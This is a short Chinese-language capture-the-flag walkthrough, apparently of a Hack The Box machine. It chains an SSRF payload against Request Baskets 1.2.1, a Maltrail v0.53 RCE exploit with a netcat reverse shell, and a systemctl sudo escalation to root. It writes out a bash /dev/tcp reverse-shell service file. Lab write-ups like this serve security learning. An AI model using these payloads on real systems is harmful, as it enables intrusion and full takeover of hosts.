nmap -sV 10.10.11.224
22,80,55555端口开放,80端口访问不了,但是55555端口有web服务
通过页面显示 Request Baskets 1.2.1版本
poc文章
使用以下有效负载来发送 /api/baskets/{name} API:
{
“forward_url”: “http://127.0.0.1:80”,
“proxy_response”: true,
“insecure_tls”: false,
“expand_path”: true,
“capacity”: 250
}
访问http://10.10.11.224:55555/hang0c即可看到80端口上的内容
在左下角发现Maltrail v0.53
搜索到一个rce的文章地址
我们需要监听对应的端口,在进行执行脚本就可以rce了
nc -lnvp 1234
python3 exploit.py 10.10.14.27 1234 http://10.10.11.224:55555/hang0c
成功反弹shell
这个时候我们就可以得到user.txt的内容了
sudo -l
复现文章
首先进入到/dev/shm目录,创建文件mm.service
echo ‘[Service]
Type=oneshot
ExecStart=/bin/bash -c “/bin/bash -i > /dev/tcp/10.10.14.27/2345 0>&1 2<&1”
[Install]
WantedBy=multi-user.target’ > mm.service
检查一下mm.service中的内容
确认无误后,我们进入到交互shell
python3 -c ‘import pty;pty.spawn(“/bin/bash”)’
执行mm.service,启动服务
sudo systemctl link /dev/shm/mm.service
不是不需要用密码吗,为啥还用?
我们还回头看sudo -l输出的内容,限制了服务名称?
我们将服务名称改为trail.service还是需要输入密码
在GTFOBins查找systemctl提权方法
根据sudo -l的显示内容 我们直接执行
sudo systemctl status trail.service
执行一会他会停下来,我们直接输入!sh
成功提升到root权限,拿到flag
Request Baskets SSRF漏洞利用:https://notes.sjtu.edu.cn/s/MUUhEymt7
Maltrail RCE漏洞利用:https://github.com/spookier/Maltrail-v0.53-Exploit
systemctl提权:https://gtfobins.github.io/gtfobins/systemctl/#sudo
systemctl提权:https://www.cnblogs.com/zlgxzswjy/p/14781471.html